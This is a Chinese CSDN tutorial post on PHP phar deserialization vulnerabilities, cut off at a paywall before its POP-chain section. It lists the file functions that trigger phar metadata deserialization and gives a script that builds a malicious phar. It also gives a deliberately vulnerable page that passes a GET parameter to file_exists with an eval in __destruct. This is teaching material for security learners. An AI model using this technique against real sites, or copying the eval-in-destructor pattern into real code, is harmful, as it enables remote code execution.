反序列化(二) (略详细)

最新推荐文章于 2024-08-13 14:54:57 发布
最新推荐文章于 2024-08-13 14:54:57 发布
阅读量475 收藏 2
点赞数
分类专栏: 代码审计 php漏洞 反序列化 文章标签: php 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq975353472/article/details/109668373
版权
本文详细介绍了PHP中的反序列化漏洞,特别是Phar反序列化和POP链构造。Phar反序列化涉及文件操作函数,利用条件包括文件上传和魔术方法。POP链构造则利用了面向属性编程,通过寻找程序环境中已定义的对象属性,构造具有目的性的操作链。文中还提到了反序列化漏洞的挖掘思路和相关参考资料。
摘要由CSDN通过智能技术生成

反序列化(二) (略详细)

前文讲了讲__wakeup绕过,注入对象构造方法,和session反序列化。
链接为:
https://blog.csdn.net/qq975353472/article/details/109657666

这里就讲讲剩下的两种,一个是phar反序列化(推荐先去学习phar用法),和pop链构造(重点哦)

一、Phar反序列化(个人感觉漏洞类型是文件包含+文件上传)

影响函数
fileatime / filectime / filemtime
stat / fileinode / fileowner / filegroup / fileperms
file / file_get_contents / readfile / fopen
file_exists / is_dir / is_executable / is_file / is_link / is_readable / is_writeable / is_writable
parse_ini_file
unlink

实例
index8.php

<?php
	class Mikasa{
   
			public $data = "whoami";
			public function __destruct(){
   
				eval($this->data);
			}
		}
	
	$phar = new Phar("phar.phar");
	
	$phar->startBuffering();
	
	$phar->setStub("Gif89a<?php __HALT_COMPILER();?>");
	
	$QAQ = new Mikasa();
	 
	$QAQ->data = "phpinfo()";
	
	$phar->setMetadata($QAQ);
	
	$phar->addFromString("test.txt","test");
	
	$phar->stopBuffering();

index7.php

<?php

	$a = $_GET['a'];
	class Mikasa{
   
		public $data = "whoami";
		function __destruct(){
   
			eval($this->data);
		}
	}
	
	file_exists($a);

无论是否更改生成的phar文件的后缀,都可以执行,并达到反序列化的效果(这里我是把生成的phar.phar,更改为phar.txt)

最低0.47元/天 解锁文章
Single learning dog
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反序列化(一) (详细)
qq975353472的博客
11-13 522
反序列化 本文所涉及的序列化类型 __wakeup()绕过 注入对象构造方法 session反序列化 phar反序列化 pop链构造 一、序列化和反序列化 维基百科中这样定义:序列化(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。 概念很容易理解,其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 先看个例子 1、 根据目标构造对
文件包含反序列化渗透——session.upload_progress的利用 演示讲解
weixin_48083470的博客
08-06 545
利用session.upload_progress进行文件包含反序列化渗透 session.upload_progress php中和这个功能相关的有四个配置 session.upload_progress.enabled = on //功能是否开启 session.upload_progress.cleanup = on //清空是否开启 session.upload_progress.prefix = “upload_progress_” // session.upload_progress
Phar反序列化
xiaolong22333的博客
04-24 2632
在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。 Phar需要 PHP >= 5.2 在php.ini中将phar.readonly设为Off(注意去掉前面的分号) phar文件的结构 stub:phar文件的标志,必须以.
谈一谈PHP反序列化
Lethe's Blog
08-07 1411
0x01 基础知识 PHP序列化:php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串中,使用serialize()函数。 PHP反序列化:将被压缩为字符串的复杂数据结构,重新恢复,使用unserialize()函数。 PHP反序列化漏洞:如果代码中使用了反序列化 unserialize()函数,并且参数可控,且程序没有对用户输入的反序列化字符串进行校验,那么可以通过在...
极客巅峰 2020 babyphp2(phar反序列化
y0un9er
10-02 728
文章目录前言一、什么是 phar 反序列化1.三个条件2.生成 phar 文件的常见代码题目分析下载源码classes.php生成 phar 文件总结 前言 这题比赛的时候,我一脸懵逼,大佬提示才知道源码泄露。但是之前没做过 phar 反序列化的题,脸懵逼。还好源码没删,自己搭建了环境,看着大佬们的wp复现一番。点击打开题目 VPS 20年12月10号过期,望见谅。 一、什么是 phar 反序列化 利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息。phar简介 .
Phar 文件上传以及反序列化
十一.的博客
11-13 576
第2步:把生成的exp.phar,改成exp.zip(题目白名单过滤)然后通过文件上传功能点上传。2.phar://伪协议 是php解压缩报的一个函数,不管后缀是什么,都会当做压缩包来解压。第3步:访问 图片路径/test.php (由于题目会加php后缀,则文件包含的时候不用加)首先生成上传phar文件(改后缀为jpg绕过检测)(1)不涉及反序列化,文件上传+文件包含 上传。首先构造phar文件 ,然后上传。5.关闭readonly模式。1、能将phar文件上传。将 phar 文件使用。
.Net中的序列化和反序列化详解
10-22
在.NET框架中,序列化和反序列化是两个非常重要的概念,它们在数据存储、网络通信和应用程序状态持久化等方面扮演着关键角色。序列化是将对象的状态信息转换为可以存储或传输的形式的过程,而反序列化则是序列化的逆...
CH07-C#序列化和反序化.md
12-27
序列化是通过将对象转换为字节流,从而存储对象或将对象传输到内存,数据库或文件的过程。 主要用途是保存对象的状态,包括对象的数据,以便能够在需要是重建对象。反向过程称为 反序列化
Json的序列化与反序列化
12-29
在.NET框架中,`DataContractJsonSerializer`是用于JSON序列化和反序列化的类,它属于System.Runtime.Serialization命名空间,主要用于WCF(Windows Communication Foundation)服务中的数据交换。 **JSON序列化** ...
WCF 序列化与反序列化复杂类型(DataContractSerializer)
09-15
在WCF中,数据交换通常涉及序列化和反序列化过程,即将对象转换为可以传输的格式(如XML),以及将这种传输格式还原为对象。本篇文章将深入探讨如何使用`DataContractSerializer`处理WCF中的复杂类型序列化和反序列...
序列化与反序列化的使用
05-24
此外,进制序列化的安全性较低,因为未经验证的数据可以反序列化,这可能导致安全漏洞。 2. **XML序列化**: `XmlSerializer`类用于将对象转换为XML格式,反之亦然。XML是一种可读性强、结构化的数据表示形式,...
Phar反序列化详细总结
2301_76690905的博客
11-09 193
phar协议,phar.phar包,和保存在phar包中的文件test.txt。被压缩的文件内容,在没有特殊要求的情况下,这个被压缩的文件内容可以随便写的,因为我们利用这个漏洞主要是为了触发它的反序列化。有file_exists(),fopen(),file_get_contents(),file()等文件操作的函数。Phar文件中被压缩的文件的一些信息,其中Meta-data部分的信息会以序列化的形式储存(当文件操作函数通过。,放在文件末尾,如果我们修改了文件的内容,之前的签名就会无效,就需要。
[CISCN2019 华北赛区 Day1 Web1]Dropbox详解
SHININGENDING的博客
04-23 1957
[CISCN2019 华北赛区 Day1 Web1]Dropbox 一、知识点:信息搜集,Phar反序列化 phar知识点分析 phar文件的结构主要分为四个部分: stub phar文件的表示,类似于gif文件的GIF89a,以 xxx<?php xxx;__HALT__COMPILER();?>为固定形式,前面内容可以变,点必须以__HALT__COMPILER();?>结尾。 2. a mainfest describing the contents 该部分是phar...
php反序列化漏洞解析和研究
god_Zeo的安全博客
01-03 558
php反序列化漏洞解析和研究PHP序列化是什么铺垫知识示例序列化反序列实例魔术方法比较重要的方法反序列化对象注入绕过__wakeup()方法POP链构造POP:面向属性编程基本概念POP链利用训练 PHP序列化是什么 serialize() //将一个对象转换成一个字符串 unserialize() //将字符串还原成一个对象 序列化:将php值转换为可存储或传输的字符串,目的是防...
[NCTF2019]phar matches everything
soldi_er的博客
06-08 838
文章目录信息搜集、验证利用条件信息搜集查看WP漏洞利用构造phar文件绕过简单检查Poc 信息搜集、验证利用条件 ####验证利用条件   phar反序列化漏洞的三个条件:可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。   (1)条件一:上传文件到服务端,满足。   (2)可控参数和解析函数,通过前端代码找到catchmime.php的post参数name,可以访问服务器文件,满足。   (3)可执行的类、以及魔法函数,缺失信息。 信息搜集   dirsearch进行目录扫描
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6812
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
文件上传-.user.ini利用
最新发布
feiwujiushiwo的博客
08-13 218
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
BBoss与XStream序列化/反序列化性能深度对比分析
在小负荷情况下,Bboss的序列化和反序列化速度明显快于XStream,大约快3到4倍,尽管其生成的序列化数据包大。对于中等和大数据量,Bboss的性能优势更加显著,序列化速度依旧快3到4倍,且序列化数据包大小接近实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值